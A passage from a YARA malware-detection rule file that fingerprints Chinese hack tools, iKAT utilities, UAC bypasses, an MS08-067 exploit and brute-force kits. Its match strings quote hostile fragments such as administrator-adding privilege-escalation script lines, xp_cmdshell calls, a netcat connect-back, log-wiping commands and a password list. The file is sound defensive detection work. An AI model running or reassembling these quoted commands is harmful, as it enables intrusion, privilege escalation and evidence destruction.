Roth" score = 70 date = "12.10.2014" strings: $s0 = "Golden Fox" fullword wide $s1 = "Syn Scan Port" fullword wide $s2 = "CZ88.NET" fullword wide condition: all of them } rule CN_Hacktool_ScanPort_Portscanner { meta: description = "Detects a chinese Portscanner named ScanPort" author = "Florian Roth" score = 70 date = "12.10.2014" strings: $s0 = "LScanPort" fullword wide $s1 = "LScanPort Microsoft" fullword wide $s2 = "www.yupsoft.com" fullword wide condition: all of them } rule CN_Hacktool_S_EXE_Portscanner { meta: description = "Detects a chinese Portscanner named s.exe" author = "Florian Roth" score = 70 date = "12.10.2014" strings: $s0 = "\\Result.txt" fullword ascii $s1 = "By:ZT QQ:376789051" fullword ascii $s2 = "(http://www.eyuyan.com)" fullword wide condition: all of them } /* $s0 here is the same batch line as $s5 in Tzddos_DDoS_Tool_CN further down; the two rules overlap on that dropped batch file. */ rule CN_Hacktool_MilkT_BAT { meta: description = "Detects a chinese Portscanner named MilkT - shipped BAT" author = "Florian Roth" score = 70 date = "12.10.2014" strings: $s0 = 
"for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" ascii $s1 = "if not \"%Choice%\"==\"\" set Choice=%Choice:~0,1%" ascii condition: all of them } rule CN_Hacktool_MilkT_Scanner { meta: description = "Detects a chinese Portscanner named MilkT" author = "Florian Roth" score = 60 date = "12.10.2014" strings: $s0 = "Bf **************" ascii fullword $s1 = "forming Time: %d/" ascii $s2 = "KERNEL32.DLL" ascii fullword $s3 = "CRTDLL.DLL" ascii fullword $s4 = "WS2_32.DLL" ascii fullword $s5 = "GetProcAddress" ascii fullword $s6 = "atoi" ascii fullword condition: all of them } rule CN_Hacktool_1433_Scanner { meta: description = "Detects a chinese MSSQL scanner" author = "Florian Roth" score = 40 date = "12.10.2014" strings: $magic = { 4d 5a } $s0 = "1433" wide fullword $s1 = "1433V" wide $s2 = "del Weak1.txt" ascii fullword $s3 = "del Attack.txt" ascii fullword $s4 = "del /s /Q C:\\Windows\\system32\\doors\\" fullword ascii $s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii condition: ( $magic at 0 ) and all of ($s*) } rule CN_Hacktool_1433_Scanner_Comp2 { meta: description = "Detects a chinese MSSQL scanner - component 2" author = "Florian Roth" score = 40 date = "12.10.2014" strings: $magic = { 4d 5a } $s0 = "1433" wide fullword $s1 = "1433V" wide $s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword condition: ( $magic at 0 ) and all of ($s*) } rule WCE_Modified_1_1014 { meta: description = "Modified (packed) version of Windows Credential Editor" author = "Florian Roth" hash = "09a412ac3c85cedce2642a19e99d8f903a2e0354" score = 70 strings: $s0 = "LSASS.EXE" fullword ascii $s1 = "_CREDS" ascii $s9 = "Using WCE " ascii condition: all of them } /* Matches the genuine ReactOS cmd.exe version strings, so legitimate ReactOS binaries hit this rule too; the score of 30 marks it as context rather than a verdict. */ rule ReactOS_cmd_valid { meta: description = "ReactOS cmd.exe with correct file name - maybe packed with software or part of hacker toolset" author = "Florian Roth" date = "05.11.14" reference = "http://www.elifulkerson.com/articles/suzy-sells-cmd-shells.php" score 
= 30 hash = "b88f050fa69d85af3ff99af90a157435296cbb6e" strings: $s1 = "ReactOS Command Processor" fullword wide $s2 = "Copyright (C) 1994-1998 Tim Norman and others" fullword wide $s3 = "Eric Kohl and others" fullword wide $s4 = "ReactOS Operating System" fullword wide condition: all of ($s*) } rule iKAT_wmi_rundll { meta: description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe" author = "Florian Roth" date = "05.11.14" score = 65 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "97c4d4e6a644eed5aa12437805e39213e494d120" strings: $s0 = "This operating system is not supported." fullword ascii $s1 = "Error!" fullword ascii $s2 = "Win32 only!" fullword ascii $s3 = "COMCTL32.dll" fullword ascii $s4 = "[LordPE]" ascii $s5 = "CRTDLL.dll" fullword ascii $s6 = "VBScript" fullword ascii $s7 = "CoUninitialize" fullword ascii condition: all of them and filesize < 15KB } rule iKAT_revelations { meta: description = "iKAT hack tool showing the content of password fields - file revelations.exe" author = "Florian Roth" date = "05.11.14" score = 75 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "c4e217a8f2a2433297961561c5926cbd522f7996" strings: $s0 = "The RevelationHelper.DLL file is corrupt or missing." fullword ascii $s8 = "BETAsupport@snadboy.com" fullword wide $s9 = "support@snadboy.com" fullword wide $s14 = "RevelationHelper.dll" fullword ascii condition: all of them } /* The strings are lines of the VBScript itself, so this detects the script source rather than a compiled artifact. The task name "wDw00t" recurs in most of them; $s7, $s8, $s10, $s13 and $s14 are the ones that still count towards "2 of them" if a variant renames the task. */ rule iKAT_priv_esc_tasksch { meta: description = "Task Schedulder Local Exploit - Windows local priv-esc using Task Scheduler, published by webDevil. Supports Windows 7 and Vista." 
author = "Florian Roth" date = "05.11.14" score = 75 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "84ab94bff7abf10ffe4446ff280f071f9702cf8b" strings: $s0 = "objShell.Run \"schtasks /change /TN wDw00t /disable\",,True" fullword ascii $s3 = "objShell.Run \"schtasks /run /TN wDw00t\",,True" fullword ascii $s4 = "'objShell.Run \"cmd /c copy C:\\windows\\system32\\tasks\\wDw00t .\",,True" fullword ascii $s6 = "a.WriteLine (\"schtasks /delete /f /TN wDw00t\")" fullword ascii $s7 = "a.WriteLine (\"net user /add ikat ikat\")" fullword ascii $s8 = "a.WriteLine (\"cmd.exe\")" fullword ascii $s9 = "strFileName=\"C:\\windows\\system32\\tasks\\wDw00t\"" fullword ascii $s10 = "For n = 1 To (Len (hexXML) - 1) step 2" fullword ascii $s13 = "output.writeline \" Should work on Vista/Win7/2008 x86/x64\"" fullword ascii $s11 = "Set objExecObject = objShell.Exec(\"cmd /c schtasks /query /XML /TN wDw00t\")" fullword ascii $s12 = "objShell.Run \"schtasks /create /TN wDw00t /sc monthly /tr \"\"\"+biatchFile+\"" ascii $s14 = "a.WriteLine (\"net localgroup administrators /add v4l\")" fullword ascii $s20 = "Set ts = fso.createtextfile (\"wDw00t.xml\")" fullword ascii condition: 2 of them } rule iKAT_command_lines_agent { meta: description = "iKAT hack tools set agent - file ikat.exe" author = "Florian Roth" date = "05.11.14" score = 75 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94" strings: $s0 = "Extended Module: super mario brothers" fullword ascii $s1 = "Extended Module: " fullword ascii $s3 = "ofpurenostalgicfeeling" fullword ascii $s8 = "-supermariobrotheretic" fullword ascii $s9 = "!http://132.147.96.202:80" fullword ascii $s12 = "iKAT Exe Template" fullword ascii $s15 = "withadancyflavour.." 
fullword ascii $s16 = "FastTracker v2.00 " fullword ascii condition: 4 of them } rule iKAT_cmd_as_dll { meta: description = "iKAT toolset file cmd.dll ReactOS file cloaked" author = "Florian Roth" date = "05.11.14" score = 65 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "b5d0ba941efbc3b5c97fe70f70c14b2050b8336a" strings: $s1 = "cmd.exe" fullword wide $s2 = "ReactOS Development Team" fullword wide $s3 = "ReactOS Command Processor" fullword wide $ext = "extension: .dll" nocase condition: all of ($s*) and $ext } /* Generic Nmap fingerprint (score 50): legitimate Nmap installs match as well, so correlate a hit with where the binary lives and who ran it. */ rule iKAT_tools_nmap { meta: description = "Generic rule for NMAP - based on NMAP 4 standalone" author = "Florian Roth" date = "05.11.14" score = 50 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "d0543f365df61e6ebb5e345943577cc40fca8682" strings: $s0 = "Insecure.Org" fullword wide $s1 = "Copyright (c) Insecure.Com" fullword wide $s2 = "nmap" fullword nocase $s3 = "Are you alert enough to be using Nmap? Have some coffee or Jolt(tm)." 
ascii condition: all of them } /* NOTE(review): the strings look like X.509 subject/issuer fields of a code-signing certificate rather than program code, which would make any binary signed by the same publisher match - confirm against the sample before relying on it. */ rule iKAT_startbar { meta: description = "Tool to hide unhide the windows startbar from command line - iKAT hack tools - file startbar.exe" author = "Florian Roth" date = "05.11.14" score = 50 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" hash = "0cac59b80b5427a8780168e1b85c540efffaf74f" strings: $s2 = "Shinysoft Limited1" fullword ascii $s3 = "Shinysoft Limited0" fullword ascii $s4 = "Wellington1" fullword ascii $s6 = "Wainuiomata1" fullword ascii $s8 = "56 Wright St1" fullword ascii $s9 = "UTN-USERFirst-Object" fullword ascii $s10 = "New Zealand1" fullword ascii condition: all of them } rule iKAT_gpdisable_customcmd_kitrap0d_uacpoc { meta: description = "iKAT hack tool set generic rule - from files gpdisable.exe, customcmd.exe, kitrap0d.exe, uacpoc.exe" author = "Florian Roth" date = "05.11.14" reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" super_rule = 1 hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f" hash1 = "2725690954c2ad61f5443eb9eec5bd16ab320014" hash2 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9" hash3 = "b65a460d015fd94830d55e8eeaf6222321e12349" score = 20 strings: $s0 = "Failed to get temp file for source AES decryption" fullword $s5 = "Failed to get encryption header for pwd-protect" fullword $s17 = "Failed to get filetime" fullword $s20 = "Failed to delete temp file for password decoding (3)" fullword condition: all of them } rule iKAT_Tool_Generic { meta: description = "Generic Rule for hack tool iKAT files gpdisable.exe, kitrap0d.exe, uacpoc.exe" author = "Florian Roth" date = "05.11.14" score = 55 reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html" super_rule = 1 hash0 = "814c126f21bc5e993499f0c4e15b280bf7c1c77f" hash1 = "75f5aed1e719443a710b70f2004f34b2fe30f2a9" hash2 = "b65a460d015fd94830d55e8eeaf6222321e12349" strings: $s0 = "<IconFile>C:\\WINDOWS\\App.ico</IconFile>" fullword $s1 = "Failed to read the entire file" fullword $s4 = 
"<VersionCreatedBy>14.4.0</VersionCreatedBy>" fullword $s8 = "<ProgressCaption>Run &quot;executor.bat&quot; once the shell has spawned.</P" $s9 = "Running Zip pipeline..." fullword $s10 = "<FinTitle />" fullword $s12 = "<AutoTemp>0</AutoTemp>" fullword $s14 = "<DefaultDir>%TEMP%</DefaultDir>" fullword $s15 = "AES Encrypting..." fullword $s20 = "<UnzipDir>%TEMP%</UnzipDir>" fullword condition: all of them } rule BypassUac2 { meta: description = "Auto-generated rule - file BypassUac2.zip" author = "yarGen Yara Rule Generator" hash = "ef3e7dd2d1384ecec1a37254303959a43695df61" strings: $s0 = "/BypassUac/BypassUac/BypassUac_Utils.cpp" fullword ascii $s1 = "/BypassUac/BypassUacDll/BypassUacDll.aps" fullword ascii $s3 = "/BypassUac/BypassUac/BypassUac.ico" fullword ascii condition: all of them } rule BypassUac_3 { meta: description = "Auto-generated rule - file BypassUacDll.dll" author = "yarGen Yara Rule Generator" hash = "1974aacd0ed987119999735cad8413031115ce35" strings: $s0 = "BypassUacDLL.dll" fullword wide $s1 = "\\Release\\BypassUacDll" ascii $s3 = "Win7ElevateDLL" fullword wide $s7 = "BypassUacDLL" fullword wide condition: 3 of them } rule BypassUac_9 { meta: description = "Auto-generated rule - file BypassUac.zip" author = "yarGen Yara Rule Generator" hash = "93c2375b2e4f75fc780553600fbdfd3cb344e69d" strings: $s0 = "/x86/BypassUac.exe" fullword ascii $s1 = "/x64/BypassUac.exe" fullword ascii $s2 = "/x86/BypassUacDll.dll" fullword ascii $s3 = "/x64/BypassUacDll.dll" fullword ascii $s15 = "BypassUac" fullword ascii condition: all of them } rule BypassUacDll_6 { meta: description = "Auto-generated rule - file BypassUacDll.aps" author = "yarGen Yara Rule Generator" hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531" strings: $s3 = "BypassUacDLL.dll" fullword wide $s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii condition: all of them } /* Exact duplicate of BypassUacDll_6 (same hash, strings and condition); one copy can be dropped once no other rule references it by name. */ rule BypassUacDll_7 { meta: description = "Auto-generated rule - file BypassUacDll.aps" author = "yarGen Yara Rule Generator" hash = 
"58d7b24b6870cb7f1ec4807d2f77dd984077e531" strings: $s3 = "BypassUacDLL.dll" fullword wide $s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii condition: all of them } /* The description and hash are copied from the two BypassUacDll.aps rules above, but the strings reference different artifacts than that resource file; refresh the meta from the actual sample this rule was written against. */ rule BypassUac_EXE { meta: description = "Auto-generated rule - file BypassUacDll.aps" author = "yarGen Yara Rule Generator" hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531" strings: $s1 = "Wole32.dll" wide $s3 = "System32\\migwiz" wide $s4 = "System32\\migwiz\\CRYPTBASE.dll" wide $s5 = "Elevation:Administrator!new:" wide $s6 = "BypassUac" wide condition: all of them } rule APT_Proxy_Malware_Packed_dev { meta: author = "FRoth" date = "2014-11-10" description = "APT Malware - Proxy" hash = "6b6a86ceeab64a6cb273debfa82aec58" score = 50 strings: $string0 = "PECompact2" fullword $string1 = "[LordPE]" $string2 = "steam_ker.dll" condition: all of them } /* $s5 is the same batch line as $s0 in CN_Hacktool_MilkT_BAT above; the two rules overlap on that file. */ rule Tzddos_DDoS_Tool_CN { meta: description = "Disclosed hacktool set - file tzddos" author = "Florian Roth" date = "17.11.14" score = 60 hash = "d4c517eda5458247edae59309453e0ae7d812f8e" strings: $s0 = "for /f %%a in (host.txt) do (" fullword ascii $s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii $s2 = "del host.txt /q" fullword ascii $s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii $s4 = "start Http.exe %%a %http%" fullword ascii $s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii $s6 = "del Result.txt s2.txt s1.txt " fullword ascii condition: all of them } rule Ncat_Hacktools_CN { meta: description = "Disclosed hacktool set - file nc.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "001c0c01c96fa56216159f83f6f298755366e528" strings: $s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii $s2 = "nc [-options] hostname port[s] [ports] ... 
" fullword ascii $s3 = "gethostpoop fuxored" fullword ascii $s6 = "VERNOTSUPPORTED" fullword ascii $s7 = "%s [%s] %d (%s)" fullword ascii $s12 = " `--%s' doesn't allow an argument" fullword ascii condition: all of them } rule MS08_067_Exploit_Hacktools_CN { meta: description = "Disclosed hacktool set - file cs.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "a3e9e0655447494253a1a60dbc763d9661181322" strings: $s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii $s3 = "Make SMB Connection error:%d" fullword ascii $s5 = "Send Payload Over!" fullword ascii $s7 = "Maybe Patched!" fullword ascii $s8 = "RpcExceptionCode() = %u" fullword ascii $s11 = "ph4nt0m" fullword wide $s12 = "\\\\%s\\IPC" ascii condition: 4 of them } rule Hacktools_CN_Burst_sql { meta: description = "Disclosed hacktool set - file sql.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "d5139b865e99b7a276af7ae11b14096adb928245" strings: $s0 = "s.exe %s %s %s %s %d /save" fullword ascii $s2 = "s.exe start error...%d" fullword ascii $s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii $s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii $s10 = "Result.txt" fullword ascii $s11 = "Usage:sql.exe [options]" fullword ascii $s17 = "%s root %s %d error" fullword ascii $s18 = "Pass.txt" fullword ascii $s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii condition: 6 of them } /* Archive-content rule: the four strings are file names inside the RAR, so it fires on the packaged toolset, not on the extracted binaries. */ rule Hacktools_CN_Panda_445TOOL { meta: description = "Disclosed hacktool set - file 445TOOL.rar" author = "Florian Roth" date = "17.11.14" score = 60 hash = "92050ba43029f914696289598cf3b18e34457a11" strings: $s0 = "scan.bat" fullword ascii $s1 = "Http.exe" fullword ascii $s2 = "GOGOGO.bat" fullword ascii $s3 = "ip.txt" fullword ascii condition: all of them } rule Hacktools_CN_Panda_445 { meta: description = "Disclosed hacktool set - file 445.rar" author = "Florian Roth" date = "17.11.14" score = 60 hash = 
"a61316578bcbde66f39d88e7fc113c134b5b966b" strings: $s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii $s1 = "445\\nc.exe" fullword ascii $s2 = "445\\s.exe" fullword ascii $s3 = "cs.exe %1" fullword ascii $s4 = "445\\cs.exe" fullword ascii $s5 = "445\\ip.txt" fullword ascii $s6 = "445\\cmd.bat" fullword ascii $s9 = "@echo off" fullword ascii condition: all of them } rule Hacktools_CN_WinEggDrop { meta: description = "Disclosed hacktool set - file s.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "7665011742ce01f57e8dc0a85d35ec556035145d" strings: $s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii $s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii $s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii $s8 = "Something Wrong About The Ports" fullword ascii $s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii $s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii $s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii $s13 = "%-16s %-5d -> \"%s\"" fullword ascii $s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii $s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii $s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. 
Found %u Open Ports" fullword ascii condition: 5 of them } rule Hacktools_CN_Scan_BAT { meta: description = "Disclosed hacktool set - file scan.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a" strings: $s0 = "for /f %%a in (host.txt) do (" fullword ascii $s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii $s2 = "del host.txt /q" fullword ascii $s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii $s4 = "start Http.exe %%a %http%" fullword ascii $s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii condition: 5 of them } rule Hacktools_CN_Panda_Burst { meta: description = "Disclosed hacktool set - file Burst.rar" author = "Florian Roth" date = "17.11.14" score = 60 hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776" strings: $s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." 
ascii condition: all of them } rule Hacktools_CN_445_cmd { meta: description = "Disclosed hacktool set - file cmd.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "69b105a3aec3234819868c1a913772c40c6b727a" strings: $bat = "@echo off" fullword ascii $s0 = "cs.exe %1" fullword ascii $s2 = "nc %1 4444" fullword ascii condition: $bat at 0 and all of ($s*) } rule Hacktools_CN_GOGOGO_Bat { meta: description = "Disclosed hacktool set - file GOGOGO.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd" strings: $s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii $s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii $s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii $s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii $s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii $s6 = "del /f tcpip.sys" fullword ascii $s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii $s10 = "call scan.bat" fullword ascii $s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii $s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii $s18 = "sc config LmHosts start= auto" fullword ascii $s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii $s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii condition: 3 of them } rule Hacktools_CN_Burst_pass { meta: description = "Disclosed hacktool set - file pass.txt" author = "Florian Roth" date = "17.11.14" score = 60 hash = "55a05cf93dbd274355d798534be471dff26803f9" strings: $s0 = "123456.com" fullword ascii $s1 = "123123.com" fullword ascii $s2 = "360.com" fullword ascii $s3 = "123.com" fullword ascii $s4 = "juso.com" fullword ascii $s5 = "sina.com" fullword ascii $s7 = "changeme" 
fullword ascii $s8 = "master" fullword ascii $s9 = "google.com" fullword ascii $s10 = "chinanet" fullword ascii $s12 = "lionking" fullword ascii condition: all of them } rule Hacktools_CN_JoHor_Posts_Killer { meta: description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a" strings: $s0 = "Multithreading Posts_Send Killer" fullword ascii $s3 = "GET [Access Point] HTTP/1.1" fullword ascii $s6 = "The program's need files was not exist!" fullword ascii $s7 = "JoHor_Posts_Killer" fullword wide $s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii $s10 = " ( /s ) :" fullword ascii $s11 = "forms.vbp" fullword ascii $s12 = "forms.vcp" fullword ascii $s13 = "Software\\FlySky\\E\\Install" fullword ascii condition: 5 of them } rule Hacktools_CN_Panda_tesksd { meta: description = "Disclosed hacktool set - file tesksd.jpg" author = "Florian Roth" date = "17.11.14" score = 60 hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb" strings: $s0 = "name=\"Microsoft.Windows.Common-Controls\" " fullword ascii $s1 = "ExeMiniDownload.exe" fullword wide $s16 = "POST %Hs" fullword ascii condition: all of them } rule Hacktools_CN_Http { meta: description = "Disclosed hacktool set - file Http.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "788bf0fdb2f15e0c628da7056b4e7b1a66340338" strings: $s0 = "RPCRT4.DLL" fullword ascii $s1 = "WNetAddConnection2A" fullword ascii $s2 = "NdrPointerBufferSize" fullword ascii $s3 = "_controlfp" fullword ascii condition: all of them and filesize < 10KB } rule Hacktools_CN_Burst_Start { meta: description = "Disclosed hacktool set - file Start.bat - DoS tool" author = "Florian Roth" date = "17.11.14" score = 60 hash = "75d194d53ccc37a68286d246f2a84af6b070e30c" strings: $s0 = "for /f \"eol= tokens=1,2 delims= \" %%i in (ip.txt) do (" fullword ascii $s1 = "Blast.bat /r 600" fullword ascii $s2 = 
"Blast.bat /l Blast.bat" fullword ascii $s3 = "Blast.bat /c 600" fullword ascii $s4 = "start Clear.bat" fullword ascii $s5 = "del Result.txt" fullword ascii $s6 = "s syn %%i %%j 3306 /save" fullword ascii $s7 = "start Thecard.bat" fullword ascii $s10 = "setlocal enabledelayedexpansion" fullword ascii condition: 5 of them } rule Hacktools_CN_Panda_tasksvr { meta: description = "Disclosed hacktool set - file tasksvr.exe" author = "Florian Roth" date = "17.11.14" score = 60 hash = "a73fc74086c8bb583b1e3dcfd326e7a383007dc0" strings: $s2 = "Consys21.dll" fullword ascii $s4 = "360EntCall.exe" fullword wide $s15 = "Beijing1" fullword ascii condition: all of them } rule Hacktools_CN_Burst_Clear { meta: description = "Disclosed hacktool set - file Clear.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "148c574a4e6e661aeadaf3a4c9eafa92a00b68e4" strings: $s0 = "del /f /s /q %systemdrive%\\*.log " fullword ascii $s1 = "del /f /s /q %windir%\\*.bak " fullword ascii $s4 = "del /f /s /q %systemdrive%\\*.chk " fullword ascii $s5 = "del /f /s /q %systemdrive%\\*.tmp " fullword ascii $s8 = "del /f /q %userprofile%\\COOKIES s\\*.* " fullword ascii $s9 = "rd /s /q %windir%\\temp & md %windir%\\temp " fullword ascii $s11 = "del /f /s /q %systemdrive%\\recycled\\*.* " fullword ascii $s12 = "del /f /s /q \"%userprofile%\\Local Settings\\Temp\\*.*\" " fullword ascii $s19 = "del /f /s /q \"%userprofile%\\Local Settings\\Temporary Internet Files\\*.*\" " ascii condition: 5 of them } rule Hacktools_CN_Burst_Thecard { meta: description = "Disclosed hacktool set - file Thecard.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "50b01ea0bfa5ded855b19b024d39a3d632bacb4c" strings: $s0 = "tasklist |find \"Clear.bat\"||start Clear.bat" fullword ascii $s1 = "Http://www.coffeewl.com" fullword ascii $s2 = "ping -n 2 localhost 1>nul 2>nul" fullword ascii $s3 = "for /L %%a in (" fullword ascii $s4 = "MODE con: COLS=42 lines=5" fullword ascii condition: all of them } rule 
Hacktools_CN_Burst_Blast { meta: description = "Disclosed hacktool set - file Blast.bat" author = "Florian Roth" date = "17.11.14" score = 60 hash = "b07702a381fa2eaee40b96ae2443918209674051" strings: $s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http:" ascii $s1 = "@echo off" fullword ascii condition: all of them } rule VUBrute_VUBrute { meta: description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file VUBrute.exe" author = "Florian Roth" date = "22.11.14" score = 70 hash = "166fa8c5a0ebb216c832ab61bf8872da556576a7" strings: $s0 = "Text Files (*.txt);;All Files (*)" fullword ascii $s1 = "http://ubrute.com" fullword ascii $s11 = "IP - %d; Password - %d; Combination - %d" fullword ascii $s14 = "error.txt" fullword ascii condition: all of them } rule DK_Brute { meta: description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file DK Brute.exe" author = "Florian Roth" date = "22.11.14" score = 70 reference = "http://goo.gl/xiIphp" hash = "93b7c3a01c41baecfbe42461cb455265f33fbc3d" strings: $s6 = "get_CrackedCredentials" fullword ascii $s13 = "Same port used for two different protocols:" fullword wide $s18 = "coded by fLaSh" fullword ascii $s19 = "get_grbToolsScaningCracking" fullword ascii condition: all of them } rule VUBrute_config { meta: description = "PoS Scammer Toolbox - http://goo.gl/xiIphp - file config.ini" author = "Florian Roth" date = "22.11.14" score = 70 reference = "http://goo.gl/xiIphp" hash = "b9f66b9265d2370dab887604921167c11f7d93e9" strings: $s2 = "Restore=1" fullword ascii $s6 = "Thread=" ascii $s7 = "Running=1" fullword ascii $s8 = "CheckCombination=" fullword ascii $s10 = "AutoSave=1.000000" fullword ascii $s12 = "TryConnect=" ascii $s13 = "Tray=" ascii condition: all of them } rule sig_238_hunt { meta: description = "Disclosed hacktool set (old stuff) - file hunt.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "f9f059380d95c7f8d26152b1cb361d93492077ca" strings: $s1 = "Programming by JD Glaser - All Rights Reserved" 
fullword ascii $s3 = "Usage - hunt \\\\servername" fullword ascii $s4 = ".share = %S - %S" fullword wide $s5 = "SMB share enumerator and admin finder " fullword ascii $s7 = "Hunt only runs on Windows NT..." fullword ascii $s8 = "User = %S" fullword ascii $s9 = "Admin is %s\\%s" fullword ascii condition: all of them } rule sig_238_listip { meta: description = "Disclosed hacktool set (old stuff) - file listip.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "f32a0c5bf787c10eb494eb3b83d0c7a035e7172b" strings: $s0 = "ERROR!!! Bad host lookup. Program Terminate." fullword ascii $s2 = "ERROR No.2!!! Program Terminate." fullword ascii $s4 = "Local Host Name: %s" fullword ascii $s5 = "Packed by exe32pack 1.38" fullword ascii $s7 = "Local Computer Name: %s" fullword ascii $s8 = "Local IP Adress: %s" fullword ascii condition: all of them } rule ArtTrayHookDll { meta: description = "Disclosed hacktool set (old stuff) - file ArtTrayHookDll.dll" author = "Florian Roth" date = "23.11.14" score = 60 hash = "4867214a3d96095d14aa8575f0adbb81a9381e6c" strings: $s0 = "ArtTrayHookDll.dll" fullword ascii $s7 = "?TerminateHook@@YAXXZ" fullword ascii condition: all of them } rule sig_238_eee { meta: description = "Disclosed hacktool set (old stuff) - file eee.exe" author = "Florian Roth" date = "23.11.14" score = 60 hash = "236916ce2980c359ff1d5001af6dacb99227d9cb" strings: $s0 = "szj1230@yesky.com" fullword wide $s3 = "C:\\Program Files\\DevStudio\\VB\\VB5.OLB" fullword ascii $s4 = "MailTo:szj1230@yesky.com" fullword wide $s5 = "Command1_Click" fullword ascii $s7 = "software\\microsoft\\internet explorer\\typedurls" fullword wide $s11 = "vb5chs.dll" fullword ascii $s12 = "MSVBVM50.DLL" fullword ascii condition: all of them } rule aspbackdoor_asp4 { meta: description = "Disclosed hacktool set (old stuff) - file asp4.txt" author = "Florian Roth" date = "23.11.14" score = 60 hash = "faf991664fd82a8755feb65334e5130f791baa8c" strings: $s0 = "system.dll" fullword ascii $s2 = 
